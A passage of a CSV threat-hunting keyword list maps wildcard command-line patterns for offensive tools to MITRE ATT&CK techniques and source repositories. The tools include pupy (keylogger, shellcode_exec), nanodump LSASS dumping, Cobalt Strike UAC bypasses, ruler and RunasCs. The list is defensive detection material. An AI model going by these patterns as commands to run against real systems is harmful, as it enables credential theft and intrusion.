utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*Rudrastra-main.zip*","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","8","1","46","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z" +"*ruler * abk dump -o *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*ruler -k -d * brute --users *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*ruler-linux64*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*ruler-linux86*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation 
tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*ruler-osx64*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*ruler-win64.exe*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*ruler-win86.exe*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*rules/d3ad0ne.rule*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*run * pyshell*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*run android_cam *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*run --bg shell_exec*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*run -Executable *.exe*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*run interactive_shell*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*run keylogger*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*run memory_exec *.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*run mouselogger*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*run post/windows/gather/checkvm*","offensive_tool_keyword","metasploit","Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback","T1059 - T1064 - T1029","TA0002 - TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*run post/windows/manage/killfw*","offensive_tool_keyword","metasploit","Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback","T1059 - T1064 - T1029","TA0002 - TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*run post/windows/manage/migrate*","offensive_tool_keyword","metasploit","Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback","T1059 - T1064 - T1029","TA0002 - TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*run pyexec *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*run shell_exec *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*run shellcode_exec*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*Run the krbscm method for SYSTEM shell*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*run thief:latest*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" +"*run_ppl_dump_exploit*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*run_ppl_medic_exploit*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*run_server.bat","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*runasadmin uac-cmstplua*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*runasadmin uac-token-duplication*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the 
tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*RunasCreateProcessAsUserW*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*RunasCs.exe*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*RunasCs.exe*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version 
of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*RunasCs.zip*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*RunasCs_net2.exe*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*RunasCs_net2.exe*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*RunasCsMain*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*RunasCs-master*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*runas-netonly 
*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*runasppl_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*RunAsWinTcb.exe*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" +"*RunAsWinTcb-master*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" +"*RunCleanup-77740706-9DEC-EC11-BB3D-0022482CA4A7.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security 
toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" +"*RunCodeExec-75740706-9DEC-EC11-BB3D-0022482CA4A7.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" +"*run-dll SharpSploit*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*rundll32 charlotte.dll*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"*rundll32*.dll*a*/p:*","greyware_tool_keyword","rundll32","Detects the use of getsystem Meterpreter/Cobalt Strike command. 
Getsystem is used to elevate privilege to SYSTEM account.","T1055.002 - T1078.002 - T1134.001 - T1134.002","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z" +"*rundll32*.dll*StartW*","greyware_tool_keyword","rundll32","Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.","T1218.005 - T1071.001","TA0002 - TA0003","N/A","N/A","Exploitation Tools","https://github.com/MichaelKoczwara/Awesome-CobaltStrike-Defence","1","0","greyware tool - risks of False positive !","N/A","10","1224","189","2022-07-14T07:15:10Z","2021-01-01T16:44:42Z" +"*rundll32.exe agressor.dll*dec*","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","N/A","10","1181","193","2022-08-03T03:38:57Z","2021-11-25T16:49:47Z" +"*RunDLL32JSStager*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*Run-EXEonRemote*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*RunExfil-78740706-9DEC-EC11-BB3D-0022482CA4A7.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" +"*runFakeTerminal*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*Running final exploit packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*running SharpHound*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*RunOF.exe -*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 